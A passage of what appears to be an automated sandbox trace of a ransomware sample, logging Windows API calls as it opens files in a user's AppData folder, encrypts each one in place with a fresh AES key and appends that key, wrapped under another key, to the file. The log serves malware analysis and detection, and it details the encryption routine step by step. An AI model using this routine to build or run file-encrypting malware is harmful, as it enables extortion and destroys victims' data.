dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.547] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=72450) returned 1 [0150.547] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=72450) returned 1 [0150.547] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x119e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.547] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.548] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.548] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.548] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.548] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.548] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11b02, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x11b02, lpOverlapped=0x0) returned 1 [0150.549] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.549] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x11b02, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x11b10) returned 1 [0150.550] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.550] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11b10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x11b10, lpOverlapped=0x0) returned 1 [0150.550] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.550] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.550] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.550] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.550] CloseHandle (hObject=0x18c) returned 1 [0150.576] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.579] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.580] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.580] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TO vJ.flv", dwFileAttributes=0x80) returned 1 [0150.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TO vJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\to vj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.580] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=75790) returned 1 [0150.580] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=75790) returned 1 [0150.580] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x126ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.580] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.581] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.581] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.581] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.581] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.581] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1280e, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1280e, lpOverlapped=0x0) returned 1 [0150.582] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.582] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1280e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x12810) returned 1 [0150.583] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.583] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12810, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x12810, lpOverlapped=0x0) returned 1 [0150.583] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.583] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.583] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.583] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.583] CloseHandle (hObject=0x18c) returned 1 [0150.599] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.604] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.604] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.604] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u4iYfG1p9dbIc_UDa.jpg", dwFileAttributes=0x80) returned 1 [0150.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u4iYfG1p9dbIc_UDa.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\u4iyfg1p9dbic_uda.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.605] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=30897) returned 1 [0150.605] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=30897) returned 1 [0150.605] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x778f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.605] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.605] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.605] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.605] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.605] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.606] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x78b1, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x78b1, lpOverlapped=0x0) returned 1 [0150.606] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.606] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x78b1, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x78c0) returned 1 [0150.606] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.606] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x78c0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x78c0, lpOverlapped=0x0) returned 1 [0150.606] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.606] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.606] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.607] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.607] CloseHandle (hObject=0x18c) returned 1 [0150.622] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.626] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.627] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.627] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u5j7OHVQVrWvJ.pps", dwFileAttributes=0x80) returned 1 [0150.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u5j7OHVQVrWvJ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\u5j7ohvqvrwvj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.627] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=83686) returned 1 [0150.627] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=83686) returned 1 [0150.627] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x145c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.627] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.628] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.628] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.628] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.628] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.628] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x146e6, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x146e6, lpOverlapped=0x0) returned 1 [0150.629] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.629] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x146e6, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x146f0) returned 1 [0150.630] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.630] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x146f0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x146f0, lpOverlapped=0x0) returned 1 [0150.631] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.631] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.631] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.631] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.631] CloseHandle (hObject=0x18c) returned 1 [0150.647] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.651] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.651] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.651] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.651] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.651] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UcUyVdA.gif", dwFileAttributes=0x80) returned 1 [0150.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UcUyVdA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ucuyvda.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.652] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=18862) returned 1 [0150.652] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=18862) returned 1 [0150.652] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x488c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.652] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.653] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.653] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.653] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.653] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.653] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x49ae, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x49ae, lpOverlapped=0x0) returned 1 [0150.653] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.653] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x49ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x49b0) returned 1 [0150.653] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.653] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x49b0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x49b0, lpOverlapped=0x0) returned 1 [0150.654] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.654] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.654] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.654] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.654] CloseHandle (hObject=0x18c) returned 1 [0150.670] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.674] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.675] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.675] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.675] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uGDz.doc", dwFileAttributes=0x80) returned 1 [0150.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uGDz.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ugdz.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.676] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=2128) returned 1 [0150.676] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=2128) returned 1 [0150.676] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x72e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.676] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.677] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.677] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.677] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.677] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.677] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x850, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x850, lpOverlapped=0x0) returned 1 [0150.677] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.677] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x850, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x860) returned 1 [0150.677] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.677] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x860, lpOverlapped=0x0) returned 1 [0150.677] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.677] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.677] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.678] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.678] CloseHandle (hObject=0x18c) returned 1 [0150.704] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.708] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.708] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.708] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.708] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.708] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS 